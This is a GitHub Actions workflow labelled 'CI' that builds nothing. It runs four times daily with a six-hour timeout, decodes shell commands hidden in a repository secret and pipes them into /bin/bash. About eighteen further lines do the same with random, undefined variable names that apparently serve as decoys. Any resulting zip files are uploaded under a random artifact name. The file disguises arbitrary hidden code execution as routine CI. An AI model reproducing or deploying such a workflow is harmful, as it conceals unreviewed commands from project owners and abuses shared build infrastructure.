name: CI
on:
  workflow_dispatch:

  schedule:
    - cron: '13 4,10,16,22 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  ci:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          u075: ${{ secrets.u075 }}
        run: |
          printf '%s' "$u075" | jq -r .fbh6 | /bin/bash
          printf '%s' "$ulh6430" | jq -r .fn38859 | /bin/bash
          echo $dkx71183 | jq -r .lvqpq8 | /bin/bash
          echo $u08994 | jq -r .jjhab38 | /bin/bash
          echo $aezx0 | jq -r .fpoo1809 | /bin/bash
          echo $ub77211 | jq -r .uo028 | /bin/bash
          printf '%s' "$pt642" | jq -r .a6553 | /bin/bash
          printf '%s' "$cctm691" | jq -r .vrpil2 | /bin/bash
          printf '%s' "$vfs2" | jq -r .ydh682 | /bin/bash
          echo $nce874 | jq -r .l03115 | /bin/bash
          echo $vp9395 | jq -r .ll455 | /bin/bash
          echo $jup2 | jq -r .dr75613 | /bin/bash
          echo $omtw8 | jq -r .je6 | /bin/bash
          echo $xsgo904 | jq -r .nvg7801 | /bin/bash
          echo $wxw92 | jq -r .as0922 | /bin/bash
          echo $cckx5316 | jq -r .zc5 | /bin/bash
          echo $olob978 | jq -r .mahv29145 | /bin/bash
          printf '%s' "$o3" | jq -r .mpaa0 | /bin/bash
          echo $pyqii9 | jq -r .acrec36291 | /bin/bash

      - name: Save artifact
        uses: actions/upload-artifact@v4
        with:
          name: 3VDJJlon
          path: "*.zip"
          retention-days: 1
